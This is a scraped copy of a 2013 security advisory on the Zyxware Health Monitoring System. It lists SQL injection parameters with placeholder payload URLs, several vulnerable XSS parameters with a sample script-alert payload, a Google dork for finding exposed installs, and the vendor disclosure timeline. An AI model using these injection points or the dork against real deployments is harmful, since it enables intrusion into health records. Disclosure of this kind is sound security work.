扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
# Exploit Title: Zyxware Health Monitoring System Multiple Vulnerability # Google Dork: Inurl:maps/layers.php?bdywidth= (and more) # Date: 07 Sep 2013 # Vendor Homepage: http://www.zyxware.com/ # Software Link: https://github.com/zyxware/Zyxware-Health-Monitoring-System/ # Version: # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/healthmonitor/maps/diseaseinfo.php Parameter : strDiseaseName http://localhost/healthmonitor/maps/diseaseinfo.php?strDiseaseName=1'{SQLHERE} Found On http://localhost/healthmonitor/maps/summary.php Parameter : opt http://localhost/healthmonitor/maps/summary.php?opt=1'{SQL HERE}&type=Dist ======================== XSS Vulnerability ======================== Found On : http://localhost/healthmonitor/maps/diseaseinfo.php parameter : rightContent http://localhost/healthmonitor/maps/googlemap.php parameter : mapheight and mapwidth http://localhost/healthmonitor/maps/khmheading.php parameter : imageheight http://localhost/healthmonitor/maps/moreinfo.php parameter : rightContent http://localhost/healthmonitor/maps/summary.php parameter : optand rightContent Example : http://localhost/healthmonitor/maps/khmheading.php?imageheight=0&imagePadding=%22%3Cscript%3E%20alert%28%27XSS%27%29%3C/script%3E ======================== Solution : ======================== No Solution Until This Advisory Published ======================== Timeline: ======================== 2013-09-03 Provided details vulnerability to vendor 2013-09-07 No Response From vendor 2013-09-08 Advisory published |
体验盒子
